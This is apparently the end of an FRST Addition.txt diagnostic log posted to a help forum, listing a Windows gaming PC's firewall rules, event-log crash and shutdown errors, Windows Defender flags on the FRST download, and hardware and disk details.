FirewallRules: [UDP Query User{809A1ABE-55A8-441F-875F-66CD3FAAB414}D:\games\wolcen lords of mayhem\win_x64\wolcen.exe] => (Block) D:\games\wolcen lords of mayhem\win_x64\wolcen.exe No File
FirewallRules: [TCP Query User{2B14AB9D-0947-4DD7-9C0B-1C0B7C41A742}D:\games\hearts of iron iv\hoi4.exe] => (Block) D:\games\hearts of iron iv\hoi4.exe No File
FirewallRules: [UDP Query User{092D6AD8-36C2-435F-8396-A730864CC86A}D:\games\hearts of iron iv\hoi4.exe] => (Block) D:\games\hearts of iron iv\hoi4.exe No File
FirewallRules: [TCP Query User{DD6A1276-8C5B-4784-A51C-16B244AA6AF5}D:\program files\steam\steamapps\common\paladins\binaries\win64\paladins.exe] => (Block) D:\program files\steam\steamapps\common\paladins\binaries\win64\paladins.exe No File
FirewallRules: [UDP Query User{589E3C2B-8788-4B2E-A8F5-DD566B2AD6F1}D:\program files\steam\steamapps\common\paladins\binaries\win64\paladins.exe] => (Block) D:\program files\steam\steamapps\common\paladins\binaries\win64\paladins.exe No File
FirewallRules: [TCP Query User{E0BBA607-5C59-4FA7-8BFC-280F1B49139F}C:\program files\java\jre1.8.0_45\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_45\bin\javaw.exe No File
FirewallRules: [UDP Query User{C9FB2236-F752-4DBB-A15D-535236124456}C:\program files\java\jre1.8.0_45\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_45\bin\javaw.exe No File
FirewallRules: [TCP Query User{D86A3E2B-8881-4CB6-94D9-BA4259473A04}C:\program files\java\jre1.8.0_51\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_51\bin\javaw.exe No File
FirewallRules: [UDP Query User{F2086C34-917B-4F7F-A9CB-50EED634A08B}C:\program files\java\jre1.8.0_51\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_51\bin\javaw.exe No File
FirewallRules: [TCP Query User{70A01E57-8DF8-436F-98C4-122E4EEB06BC}C:\program files\java\jre1.8.0_241\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_241\bin\javaw.exe
FirewallRules: [UDP Query User{D48D8C20-C1FB-484A-882F-A252B86B2344}C:\program files\java\jre1.8.0_241\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_241\bin\javaw.exe
FirewallRules: [TCP Query User{C736D872-A873-4829-AE27-26AABBC33C35}D:\games\call of duty - wwii\s2_sp64_ship.exe] => (Block) D:\games\call of duty - wwii\s2_sp64_ship.exe No File
FirewallRules: [UDP Query User{FE153A75-EA20-43D0-A4F4-565E9BE4D266}D:\games\call of duty - wwii\s2_sp64_ship.exe] => (Block) D:\games\call of duty - wwii\s2_sp64_ship.exe No File
FirewallRules: [TCP Query User{893AB09B-3AB4-4591-933F-42B03D4A8EBE}D:\games\call of duty - wwii\s2_mp64_ship.exe] => (Block) D:\games\call of duty - wwii\s2_mp64_ship.exe No File
FirewallRules: [UDP Query User{C278DA62-943D-4F45-8FA8-BC334072ABCE}D:\games\call of duty - wwii\s2_mp64_ship.exe] => (Block) D:\games\call of duty - wwii\s2_mp64_ship.exe No File
FirewallRules: [TCP Query User{A9FDA9A5-54DD-4180-AAA1-9073F73651A5}D:\games\call of duty modern warfare\modernwarfare.exe] => (Block) D:\games\call of duty modern warfare\modernwarfare.exe (Activision Publishing Inc -> Activision)
FirewallRules: [UDP Query User{E71D58FE-3DBA-44A6-A03C-0930E3C9C106}D:\games\call of duty modern warfare\modernwarfare.exe] => (Block) D:\games\call of duty modern warfare\modernwarfare.exe (Activision Publishing Inc -> Activision)
FirewallRules: [TCP Query User{E84DE7D9-EC52-4A58-93A4-BBB2E782F373}D:\program files\battle.net\battle.net.exe] => (Block) D:\program files\battle.net\battle.net.exe (Blizzard Entertainment, Inc. -> Blizzard Entertainment)
FirewallRules: [UDP Query User{ED5215C4-C3A2-4C16-A286-8267BF5D6075}D:\program files\battle.net\battle.net.exe] => (Block) D:\program files\battle.net\battle.net.exe (Blizzard Entertainment, Inc. -> Blizzard Entertainment)
FirewallRules: [TCP Query User{4E4A6559-C160-49C4-91F6-DCE9C0282971}D:\games\stellaris\stellaris.exe] => (Block) D:\games\stellaris\stellaris.exe (Paradox Interactive) [File not signed]
FirewallRules: [UDP Query User{F04E932A-5831-4314-B165-C863244A9F5A}D:\games\stellaris\stellaris.exe] => (Block) D:\games\stellaris\stellaris.exe (Paradox Interactive) [File not signed]
FirewallRules: [TCP Query User{2AABC613-EE66-4D07-B1FA-EBBCFF53C7AD}D:\games\sdgundam\gonline.exe] => (Block) D:\games\sdgundam\gonline.exe () [File not signed]
FirewallRules: [UDP Query User{AE9E55B0-F5C1-4D6A-8BB5-337C02E6333F}D:\games\sdgundam\gonline.exe] => (Block) D:\games\sdgundam\gonline.exe () [File not signed]
FirewallRules: [TCP Query User{CF08189C-E0FC-403C-B98F-C91BB000B308}D:\downloads\tixati_portable\tixati_windows64bit.exe] => (Block) D:\downloads\tixati_portable\tixati_windows64bit.exe No File
FirewallRules: [UDP Query User{678FD92E-3895-4029-A464-79023DA29B03}D:\downloads\tixati_portable\tixati_windows64bit.exe] => (Block) D:\downloads\tixati_portable\tixati_windows64bit.exe No File
FirewallRules: [{3C7B17AA-97DB-4DFC-B2CD-D8006AAE71F7}] => (Allow) C:\Program Files (x86)\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent, Inc.)
FirewallRules: [{0C5277CA-EDD6-4C6C-A4D0-182C6D19A418}] => (Allow) C:\Program Files (x86)\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent, Inc.)
FirewallRules: [TCP Query User{5DC566CA-A803-4D19-B1B5-0E4F53E39BAA}D:\games\mount & blade ii bannerlord\bin\win64_shipping_client\bannerlord.exe] => (Block) D:\games\mount & blade ii bannerlord\bin\win64_shipping_client\bannerlord.exe (TaleWorlds Entertainment -> ) [File not signed]
FirewallRules: [UDP Query User{EFD2F151-C25B-4597-BAA6-7BDEA6128CC0}D:\games\mount & blade ii bannerlord\bin\win64_shipping_client\bannerlord.exe] => (Block) D:\games\mount & blade ii bannerlord\bin\win64_shipping_client\bannerlord.exe (TaleWorlds Entertainment -> ) [File not signed]
FirewallRules: [TCP Query User{92EFE422-B9DB-4F3E-97BC-075D1D106460}D:\games\mount & blade ii bannerlord\bin\win64_shipping_client\taleworlds.mountandblade.launcher.exe] => (Block) D:\games\mount & blade ii bannerlord\bin\win64_shipping_client\taleworlds.mountandblade.launcher.exe (TaleWorlds Entertainment -> TaleWorlds Entertainment) [File not signed]
FirewallRules: [UDP Query User{CEDF382F-607C-4716-A039-BA6B046812AF}D:\games\mount & blade ii bannerlord\bin\win64_shipping_client\taleworlds.mountandblade.launcher.exe] => (Block) D:\games\mount & blade ii bannerlord\bin\win64_shipping_client\taleworlds.mountandblade.launcher.exe (TaleWorlds Entertainment -> TaleWorlds Entertainment) [File not signed]
FirewallRules: [{0B0FAC5E-C836-4404-ADE6-17B95DC4FA74}] => (Allow) D:\Program Files\Steam\steamapps\common\Crusader Kings II\CK2game.exe (Paradox Interactive AB (publ) -> Paradox Interactive)
FirewallRules: [{80D5F115-BFAF-4DB0-A29F-3D084F1D21E9}] => (Allow) D:\Program Files\Steam\steamapps\common\Crusader Kings II\CK2game.exe (Paradox Interactive AB (publ) -> Paradox Interactive)
==================== Restore Points =========================
12-04-2020 05:43:03 Windows Update
==================== Faulty Device Manager Devices ============
==================== Event log errors: ========================
Application errors:
==================
Error: (04/10/2020 02:02:27 AM) (Source: Microsoft-Windows-Perflib) (EventID: 1020) (User: NT AUTHORITY)
Description: The required buffer size is greater than the buffer size passed to the Collect function of the "C:\Windows\System32\perfts.dll" Extensible Counter DLL for the "LSM" service. The given buffer size was 29040 and the required size was 31936.
Error: (04/09/2020 08:46:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CK2game.exe, version: 1.0.0.0, time stamp: 0x5e3c1a6b
Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0
Exception code: 0xc0000374
Fault offset: 0x00000000000f92a9
Faulting process id: 0x35c4
Faulting application start time: 0x01d60e74788bfa9b
Faulting application path: D:\Program Files\Steam\steamapps\common\Crusader Kings II\CK2game.exe
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: f51f4398-7446-47dd-add1-b8bbed37f912
Faulting package full name: 
Faulting package-relative application ID:
Error: (04/09/2020 06:24:04 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance.  hr = 0x8007045b, A system shutdown is in progress.
Error: (04/09/2020 06:24:04 PM) (Source: VSS) (EventID: 13) (User: )
Description: Volume Shadow Copy Service information: The COM Server with CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} and name CEventSystem cannot be started. [0x8007045b, A system shutdown is in progress.
Error: (04/09/2020 12:24:48 AM) (Source: Microsoft-Windows-Perflib) (EventID: 1020) (User: NT AUTHORITY)
Description: The required buffer size is greater than the buffer size passed to the Collect function of the "C:\Windows\System32\perfts.dll" Extensible Counter DLL for the "LSM" service. The given buffer size was 27992 and the required size was 30648.
Error: (04/08/2020 09:06:28 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: TaleWorlds.MountAndBlade.Launcher.exe, version: 1.0.0.0, time stamp: 0x5e8cab3d
Faulting module name: KERNELBASE.dll, version: 10.0.18362.719, time stamp: 0xb31987d3
Exception code: 0xe0434352
Fault offset: 0x000000000003a859
Faulting process id: 0x1748
Faulting application start time: 0x01d60daeb3bfab3a
Faulting application path: D:\Games\Mount & Blade II Bannerlord\bin\Win64_Shipping_Client\TaleWorlds.MountAndBlade.Launcher.exe
Faulting module path: C:\Windows\System32\KERNELBASE.dll
Report Id: 4d5f4570-79de-4acb-a9d8-606e81aaaae9
Faulting package full name: 
Faulting package-relative application ID:
Error: (04/08/2020 09:05:00 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: TaleWorlds.MountAndBlade.Launcher.exe, version: 1.0.0.0, time stamp: 0x5e8cab3d
Faulting module name: KERNELBASE.dll, version: 10.0.18362.719, time stamp: 0xb31987d3
Exception code: 0xe0434352
Fault offset: 0x000000000003a859
Faulting process id: 0x2a58
Faulting application start time: 0x01d60dae766d4fc3
Faulting application path: D:\Games\Mount & Blade II Bannerlord\bin\Win64_Shipping_Client\TaleWorlds.MountAndBlade.Launcher.exe
Faulting module path: C:\Windows\System32\KERNELBASE.dll
Report Id: 19e55e0e-0e3a-4e6b-8bb6-13479fd9541a
Faulting package full name: 
Faulting package-relative application ID:
Error: (04/08/2020 09:03:17 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: TaleWorlds.MountAndBlade.Launcher.exe, version: 1.0.0.0, time stamp: 0x5e8cab3d
Faulting module name: KERNELBASE.dll, version: 10.0.18362.719, time stamp: 0xb31987d3
Exception code: 0xe0434352
Fault offset: 0x000000000003a859
Faulting process id: 0x1824
Faulting application start time: 0x01d60dadc5550f52
Faulting application path: D:\Games\Mount & Blade II Bannerlord\bin\Win64_Shipping_Client\TaleWorlds.MountAndBlade.Launcher.exe
Faulting module path: C:\Windows\System32\KERNELBASE.dll
Report Id: 2feadc5a-5c17-49af-a7d7-16090330d5b7
Faulting package full name: 
Faulting package-relative application ID:
System errors:
=============
Error: (04/12/2020 07:44:19 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Defender Antivirus Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 100 milliseconds: Run the configured recovery program.
Error: (04/12/2020 07:19:31 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 6:59:15 AM on ‎4/‎12/‎2020 was unexpected.
Error: (04/12/2020 06:43:36 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 6:35:19 AM on ‎4/‎12/‎2020 was unexpected.
Error: (04/12/2020 06:35:19 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 5:58:49 AM on ‎4/‎12/‎2020 was unexpected.
Error: (04/12/2020 05:57:25 AM) (Source: Service Control Manager) (EventID: 7043) (User: )
Description: The Update Orchestrator Service service did not shut down properly after receiving a preshutdown control.
Error: (04/12/2020 05:32:11 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 4:55:45 AM on ‎4/‎12/‎2020 was unexpected.
Error: (04/11/2020 09:19:47 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The LGHUB Updater Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 5000 milliseconds: Restart the service.
Error: (04/11/2020 08:00:10 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 7:42:19 PM on ‎4/‎11/‎2020 was unexpected.
Windows Defender:
===================================
Date: 2020-04-12 07:55:15.397
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: Program:Win32/Wacapew.C!ml
ID: 265744
Severity: Medium
Category: Potentially Unwanted Software
Path: file:_D:\Downloads\FRST.exe; webfile:_D:\Downloads\FRST.exe|about:internet|pid:10520,ProcessStart:132311260636866298
Detection Origin: Internet
Detection Type: FastPath
Detection Source: Downloads and attachments
Process Name: C:\Program Files\WinRAR\WinRAR.exe
Security intelligence Version: AV: 1.313.1321.0, AS: 1.313.1321.0, NIS: 1.313.1321.0
Engine Version: AM: 1.1.16900.4, NIS: 1.1.16900.4
Date: 2020-04-12 07:54:35.808
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: Program:Win32/Wacapew.C!ml
ID: 265744
Severity: Medium
Category: Potentially Unwanted Software
Path: file:_D:\Downloads\FRST.exe; webfile:_D:\Downloads\FRST.exe|about:internet|pid:10520,ProcessStart:132311260636866298
Detection Origin: Internet
Detection Type: FastPath
Detection Source: Downloads and attachments
Process Name: C:\Windows\explorer.exe
Security intelligence Version: AV: 1.313.1321.0, AS: 1.313.1321.0, NIS: 1.313.1321.0
Engine Version: AM: 1.1.16900.4, NIS: 1.1.16900.4
Date: 2020-04-12 07:54:35.517
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: Program:Win32/Wacapew.C!ml
ID: 265744
Severity: Medium
Category: Potentially Unwanted Software
Path: file:_D:\Downloads\FRST.exe; webfile:_D:\Downloads\FRST.exe|about:internet|pid:10520,ProcessStart:132311260636866298
Detection Origin: Internet
Detection Type: FastPath
Detection Source: Downloads and attachments
Process Name: D:\Downloads\FRST.exe
Security intelligence Version: AV: 1.313.1321.0, AS: 1.313.1321.0, NIS: 1.313.1321.0
Engine Version: AM: 1.1.16900.4, NIS: 1.1.16900.4
Date: 2020-04-12 07:54:34.833
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: Program:Win32/Wacapew.C!ml
ID: 265744
Severity: Medium
Category: Potentially Unwanted Software
Path: file:_D:\Downloads\FRST.exe; webfile:_D:\Downloads\FRST.exe|about:internet|pid:10520,ProcessStart:132311260636866298
Detection Origin: Internet
Detection Type: FastPath
Detection Source: Downloads and attachments
Process Name: C:\Windows\System32\svchost.exe
Security intelligence Version: AV: 1.313.1321.0, AS: 1.313.1321.0, NIS: 1.313.1321.0
Engine Version: AM: 1.1.16900.4, NIS: 1.1.16900.4
Date: 2020-04-12 07:54:34.475
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: Program:Win32/Wacapew.C!ml
ID: 265744
Severity: Medium
Category: Potentially Unwanted Software
Path: file:_D:\Downloads\FRST.exe; webfile:_D:\Downloads\FRST.exe|about:internet|pid:10520,ProcessStart:132311260636866298
Detection Origin: Internet
Detection Type: FastPath
Detection Source: Downloads and attachments
Process Name: C:\Windows\System32\svchost.exe
Security intelligence Version: AV: 1.313.1321.0, AS: 1.313.1321.0, NIS: 1.313.1321.0
Engine Version: AM: 1.1.16900.4, NIS: 1.1.16900.4
==================== Memory info =========================== 
BIOS: American Megatrends Inc. 3.50 11/07/2019
Motherboard: Micro-Star International Co., Ltd B450 TOMAHAWK MAX (MS-7C02)
Processor: AMD Ryzen 5 3600 6-Core Processor 
Percentage of memory in use: 27%
Total physical RAM: 16334.44 MB
Available physical RAM: 11863.13 MB
Total Virtual: 19022.44 MB
Available Virtual: 13526.89 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:223.57 GB) (Free:39.79 GB) NTFS
Drive d: (Local Disk) (Fixed) (Total:931.51 GB) (Free:638.82 GB) NTFS
Drive e: () (Fixed) (Total:931.51 GB) (Free:128.76 GB) NTFS ==>[system with boot components (obtained from drive)]
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 8522A168)
Partition 1: (Active) - (Size=931.5 GB) - (Type=07 NTFS)
==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 6D9C3561)
Partition 1: (Active) - (Size=931.5 GB) - (Type=07 NTFS)
==========================================================
Disk: 2 (MBR Code: Windows 7/8/10) (Size: 223.6 GB) (Disk ID: 041837E3)
Partition 1: (Not Active) - (Size=223.6 GB) - (Type=07 NTFS)
==================== End of Addition.txt =======================


Edited by rom1u2, Today, 09:25 PM.



https://ift.tt/2y4dRAf
